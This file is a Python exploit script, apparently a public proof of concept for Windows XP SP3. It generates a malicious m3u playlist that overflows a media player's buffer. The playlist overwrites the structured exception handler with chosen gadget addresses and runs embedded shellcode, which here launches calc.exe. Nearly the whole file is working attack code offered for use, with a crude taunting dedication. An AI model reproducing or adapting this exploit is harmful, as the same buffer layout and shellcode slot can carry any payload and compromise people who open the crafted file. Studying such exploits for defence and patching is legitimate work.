#!/usr/bin/python
import sys,os,struct

"""
Dedicated to the person who reported it but could not exploit it..enjoy!
Tested on XP-sp3

-A.Hariri
"""

"""
0041F74F   8B00             MOV EAX,DWORD PTR DS:[EAX]
0041F751   FF50 0C          CALL DWORD PTR DS:[EAX+C]
"""
fuckurseh=struct.pack('<L',0x0041F74F)

"""
77C22798   04 24            ADD AL,24
77C2279A   FFE0             JMP EAX
"""
addAL = struct.pack('<L',0x77C22798)

#calc.exe
shellcode1=("\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02"
  "\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48"
  "\x7a\xdc\xe1\xc6\x4d\xc5\x85\x12\x22\xdc\xe5\x04\x89\xe9\x85\x4c\xec\xec\xce\xd4"
  "\xae\x59\xce\x39\x05\x1c\xc4\x40\x03\x1f\xe5\xb9\x39\x89\x2a\x49\x77\x38\x85\x12"
  "\x26\xdc\xe5\x2b\x89\xd1\x45\xc6\x5d\xc1\x0f\xa6\x89\xc1\x85\x4c\xe9\x54\x52\x69"
  "\x06\x1e\x3f\x8d\x66\x56\x4e\x7d\x87\x1d\x76\x41\x89\x9d\x02\xc6\x72\xc1\xa3\xc6"
  "\x6a\xd5\xe5\x44\x89\x5d\xbe\x4d\x02\xdd\x85\x25\x3e\x82\x3f\xbb\x62\x8b\x87\xb5"
  "\x81\x1d\x75\x1d\x6a\xa3\xd6\xaf\x71\xb5\x96\xb3\x88\xd3\x59\xb2\xe5\xbe\x6f\x21"
  "\x61\xdd\x0e\x4d")
print len(shellcode1)
buffer = "HTTP://AAA" + addAL + "A"*829 + shellcode1 + "A"*1000 + "B"*2000 + "C"*91 + "BABEBABE" + fuckurseh + "\xEB\x10\x90\x90" + "ABCD" + "C"*10

f = open("m3u.m3u","w")
f.write(buffer)
f.close
print "done"